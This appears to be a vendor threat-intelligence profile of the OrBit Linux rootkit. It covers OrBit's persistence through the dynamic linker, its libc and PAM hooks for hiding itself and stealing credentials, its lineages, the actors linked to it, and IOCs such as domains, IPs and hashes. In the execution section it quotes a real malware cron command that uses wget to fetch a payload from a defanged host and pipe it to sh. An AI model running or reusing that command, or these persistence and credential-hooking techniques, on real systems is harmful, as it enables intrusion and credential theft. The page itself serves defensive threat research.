Orbit
OrBit is a Linux userland rootkit/backdoor that persists by installing a malicious shared library and modifying dynamic linker configuration so the library is loaded into every process. First publicly analyzed in 2022, it is described as using extensive libc hooking—more than 40 hooked functions—to hide files, directories, processes, and network activity, and to evade detection. OrBit intercepts SSH and sudo authentication activity to harvest usernames and passwords via PAM-related hooks, and later builds added a pam_sm_authenticate hook that can manipulate authentication outcomes. It also provides SSH backdoor access.
The malware stores stolen credentials and configuration data in hidden directories including /lib/libseconf/, with earlier or alternate install paths including /lib/libntpVnQE6mk/ and /lib/locate/. Reported fixed artifacts from the underlying codebase include sshpass.txt, .logpam, and in 2025 activity /etc/cron.hourly/0. Researchers identified two build lineages: Lineage A retained the full feature set, while Lineage B was a reduced-feature variant that removed PAM interception, packet capture, and TCP port hiding and appears to have disappeared after 2024.
Research cited in the content concludes OrBit is not a wholly original family but a modified build/fork of the publicly available Medusa LD_PRELOAD rootkit released on GitHub in December 2022. Operators changed XOR keys, install paths, and embedded SSH credentials across samples. In 2025, OrBit-related activity introduced a two-stage infector/dropper chain: an infector scanned for ELF binaries, injected payloads into /bin/ls and other writable 64-bit ELF files, used the marker bongripz4jezuz to avoid reinfection, and created /etc/cron.hourly/0 to fetch and execute a remote payload from http://cf0[.]pw/0. The domain cf0[.]pw was reported resolving to 109.95.212[.]253, with related infrastructure including 109.95.211[.]141.
The content associates OrBit or the same codebase with multiple threat clusters rather than a single actor. Reported users include UNC3886, which matched a MEDUSA/OrBit configuration via XOR key, credentials, install path, and a strace artifact containing the string "orbit"; BLOCKADE SPIDER, which reportedly used OrBit to maintain stealthy access in VMware virtualization environments; and a 2025 campaign sharing tooling and infrastructure characteristics with the RHOMBUS Linux botnet ecosystem. High-confidence indicators mentioned in the content include SHA256 73b95b7d1006caf8d3477e4a9a0994eaa469e98b70b8c198a82c4a12c91ad49a for a 2025 two-stage infector and SHA256 b982276458a85cd3dd7c8aa6cb4bbb2d4885b385053f92395a99abbfb0e43784 for a 2020 RHOMBUS dropper with shared architecture.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
A dangerous rootkit called OrBit has been quietly targeting Linux systems for years, stealing login credentials and hiding deep inside infected machines without triggering most security tools.
A dangerous rootkit called OrBit has been quietly targeting Linux systems for years, stealing login credentials and hiding deep inside infected machines without triggering most security tools.
Techniques & procedures
15 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution
4 techniquesThat same year, a new two-stage delivery chain appeared: an infector embeds a dropper, which then extracts and installs the rootkit, with a cron job created to fetch updated payloads from an external domain.
wget --quiet http://cf0[.]pw/ 0 /etc/cron.hourly/ 0 -O- 2 >/dev/null|sh>/dev/null 2 >& 1
To make our library execute code immediately upon loading, we use the constructor attribute: void __attribute__ (( constructor )) init (). This tells the linker: “run this function before the main program even starts.”
Persistence
3 techniquesThat same year, a new two-stage delivery chain appeared: an infector embeds a dropper, which then extracts and installs the rootkit, with a cron job created to fetch updated payloads from an external domain.
Where earlier versions could only passively collect credentials when users typed them, this new version can also forge authentication outcomes, meaning attackers can approve or deny login attempts on a compromised system at will.
Its 66-export set includes a significant new hook not seen in any prior variant: pam_sm_authenticate. This is the PAM service-side authentication function, meaning the rootkit now hooks both sides of the PAM stack... allowing the attacker to approve or deny login attempts at will.
Privilege Escalation
1 techniqueStealth
6 techniquesOrBit works by embedding itself into the core of a Linux system, hooking into more than forty basic system functions so that it becomes almost completely invisible.
The infector scans the filesystem for ELF binaries and injects the second-stage payload into them. An infection marker bongripz4jezuz... is checked before each infection attempt to avoid re-infecting the same target.
All other capabilities are identical: file I/O interception, stat hiding, PAM credential capture, TCP port hiding... LD_PRELOAD management, log suppression, and process hiding. | Along the way, the operators rotate XOR keys, shuffle install paths, swap backdoor credentials, add auditd-evasion hooks...
Its evasion capabilities are comprehensive, hooking over forty libc functions to hide files, processes, and network connections from administrators and security tools alike. | All other capabilities are identical: file I/O interception, stat hiding, PAM credential capture, TCP port hiding... log suppression, and process hiding.
The malware stores captured credentials and configuration data in a hidden directory called /lib/libseconf/, which standard tools cannot see due to the rootkit’s own hooks.
Defense Impairment
2 techniquesWhere earlier versions could only passively collect credentials when users typed them, this new version can also forge authentication outcomes, meaning attackers can approve or deny login attempts on a compromised system at will.
Its 66-export set includes a significant new hook not seen in any prior variant: pam_sm_authenticate. This is the PAM service-side authentication function, meaning the rootkit now hooks both sides of the PAM stack... allowing the attacker to approve or deny login attempts at will.
Credential Access
4 techniquesAll other capabilities are identical: file I/O interception, stat hiding, PAM credential capture, TCP port hiding... pcap sniffing...
Where earlier versions could only passively collect credentials when users typed them, this new version can also forge authentication outcomes, meaning attackers can approve or deny login attempts on a compromised system at will.
Its 66-export set includes a significant new hook not seen in any prior variant: pam_sm_authenticate. This is the PAM service-side authentication function, meaning the rootkit now hooks both sides of the PAM stack... allowing the attacker to approve or deny login attempts at will.
Once inside a machine, it listens for login attempts through SSH and sudo, capturing usernames and passwords and saving them in a hidden directory that standard system scans cannot detect.
Discovery
1 techniqueCommand and Control
1 techniquea cron job created to fetch updated payloads from an external domain.
Other
1 techniqueIOCs tracked for this family
35 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Linux rootkit that embeds as a shared library, hooks core system functions to hide itself, captures SSH and sudo credentials, stores them in hidden directories, and provides covert SSH backdoor access. Later variants also hook PAM authentication to forge login outcomes and use droppers/infectors with cron-based payload retrieval.
Linux userland rootkit deployed as a shared library that patches the dynamic linker for persistence, hooks libc and PAM functions to hide activity and harvest credentials, and provides stealthy SSH backdoor access. Later variants added auditd evasion, xread compatibility logic, and PAM service-side impersonation.
Modern Linux rootkit referenced as using linker-based execution flow hijacking techniques.
Referenced as a prior Linux malware family that abused PAM APIs for credential logging and remote access.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.